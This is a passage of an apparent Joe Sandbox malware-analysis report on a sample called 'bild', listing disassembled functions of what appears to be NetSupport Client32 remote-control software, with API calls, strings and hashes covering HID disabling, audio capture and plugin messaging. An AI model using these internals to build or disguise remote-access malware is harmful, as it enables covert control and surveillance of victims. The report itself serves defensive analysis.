                                                                                    • DeleteDC.GDI32(?), ref: 1100550E
                                                                                    • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                    • DeleteObject.GDI32(?), ref: 11005528
                                                                                    • DeleteDC.GDI32(?), ref: 1100552E
                                                                                    • DeleteObject.GDI32(?), ref: 1100553F
                                                                                    • DeleteObject.GDI32(?), ref: 1100556A
                                                                                    • DeleteObject.GDI32(?), ref: 11005588
                                                                                    • DeleteObject.GDI32(?), ref: 11005591
                                                                                    • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                    • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                    • API String ID: 2789700732-770455996
                                                                                    • Opcode ID: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                    • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                    • Opcode Fuzzy Hash: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                    • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                    Function 11015290 Relevance: 43.7, APIs: 29, Instructions: 170COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • BeginPaint.USER32(?,?), ref: 110152BF
                                                                                    • GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                    • _memset.LIBCMT ref: 110152E5
                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                    • BeginPath.GDI32(00000000), ref: 1101532D
                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                    • EndPath.GDI32(00000000), ref: 11015357
                                                                                    • PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                    • SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 110153EA
                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110153F9
                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101540C
                                                                                    • DeleteObject.GDI32(00000000), ref: 11015419
                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015423
                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101542D
                                                                                    • DeleteObject.GDI32(?), ref: 11015436
                                                                                    • DeleteObject.GDI32(?), ref: 1101543F
                                                                                    • DeleteObject.GDI32(?), ref: 11015448
                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015452
                                                                                    • DeleteObject.GDI32(?), ref: 1101545B
                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015465
                                                                                    • EndPaint.USER32(?,?), ref: 11015479
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3702029449-0
                                                                                    • Opcode ID: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                    • Instruction ID: 652d7b9cefe541cc9f67407d7bb7a055c5a4b94d45e30f14e3a138b487ffb704
                                                                                    • Opcode Fuzzy Hash: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                    • Instruction Fuzzy Hash: 0D511875A10228AFDB14DBA4CC88FAEF7B9EF89304F004199E519D7244DB74AE44CF61
                                                                                    Function 110FF3C0 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 207synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75BF8400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                    • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                    • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                    • wsprintfA.USER32 ref: 110FF5BE
                                                                                    • _memset.LIBCMT ref: 110FF5CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                    • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                    • API String ID: 137837830-2801557662
                                                                                    • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                    • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                    • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                    • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                    Function 110EB120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • wsprintfA.USER32 ref: 110EB1B8
                                                                                    • GetTickCount.KERNEL32 ref: 110EB212
                                                                                    • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                    • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                    • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                    • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                    • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                    • API String ID: 3451743168-2289091950
                                                                                    • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                    • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                    • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                    • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                    Function 111352B0 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 260windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • _memset.LIBCMT ref: 11135335
                                                                                    • LoadIconA.USER32(00000000,00000455), ref: 11135403
                                                                                    • _strncpy.LIBCMT ref: 11135425
                                                                                    • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,420B7E12,00000000,1102E392,00000001), ref: 11135436
                                                                                    • LoadIconA.USER32(00000000,0000045C), ref: 11135456
                                                                                    • GetWindowTextA.USER32(00030462,?,00000180), ref: 11135478
                                                                                    • wsprintfA.USER32 ref: 111354F4
                                                                                      • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                    • wsprintfA.USER32 ref: 1113552C
                                                                                    • wsprintfA.USER32 ref: 1113558D
                                                                                    • wsprintfA.USER32 ref: 111355E8
                                                                                    • Shell_NotifyIconA.SHELL32(1102D57D,000001E8,00000001,00000000,420B7E12,00000000,1102E392,00000001), ref: 11135623
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                                    • String ID: %s$%s%s$364339$Client$SysTray
                                                                                    • API String ID: 1881589080-2544040720
                                                                                    • Opcode ID: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                    • Instruction ID: 2c8920b03c090074b43ba546e334978a2e83067bba728106ef80608c6d9e13b6
                                                                                    • Opcode Fuzzy Hash: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                    • Instruction Fuzzy Hash: EAA15CB1D042159FDB62CF74CC50BAEF7B9BB44719F4045ACE829A7284EB71AA44CF50
                                                                                    Function 11131250 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 241COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                    • API String ID: 2111968516-1286714176
                                                                                    • Opcode ID: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                    • Instruction ID: cfced163e91c544f1d9a441fe05b752d20d9a2d0abefb67461bd630bfcd17819
                                                                                    • Opcode Fuzzy Hash: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                    • Instruction Fuzzy Hash: 0C911975A50319AFEB11DFA4CD84FDAF3B4BF88725F1041A8E519A7284EB30AA40CF51
                                                                                    Function 1100B310 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • _malloc.LIBCMT ref: 1100B366
                                                                                      • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                      • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                      • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,420B7E12,?,00000000,00000000), ref: 1100AC84
                                                                                      • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                      • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                      • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                      • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                      • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                      • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                      • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                    • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,420B7E12,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                    • _calloc.LIBCMT ref: 1100B3E9
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                    • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                    • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                    Strings
                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                    • Audio, xrefs: 1100B347
                                                                                    • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                    • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                    • DisableSounds, xrefs: 1100B342
                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                    • API String ID: 1843377891-2362500394
                                                                                    • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                    • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                    • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                    • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                    Function 11125200 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 240comwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 1112523A
                                                                                    • SendMessageA.USER32(?,0000043C,00000000,?), ref: 11125251
                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 11125280
                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 111252B6
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • OleCreateStaticFromData.OLE32(00000000,111C093C,00000002,?,?,?,?), ref: 111253C2
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 111253D8
                                                                                    • _memset.LIBCMT ref: 111253E5
                                                                                    • CoUninitialize.OLE32 ref: 11125499
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                    • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                    • API String ID: 1820880743-4036218486
                                                                                    • Opcode ID: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                    • Instruction ID: 08d7bdd5ab5c60396c417d70c353951ed5684100983e189a7c8dd5e42ede2f0c
